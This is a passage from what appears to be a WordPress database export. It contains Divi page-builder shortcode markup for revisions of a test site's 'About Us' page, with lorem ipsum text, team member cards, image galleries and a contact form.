custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#fcd21d\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-04 19:15:02','2020-08-04 19:15:02','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/392-revision-v1/',0,'revision','',0),(411,1,'2020-08-04 19:15:58','2020-08-04 19:15:58','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" 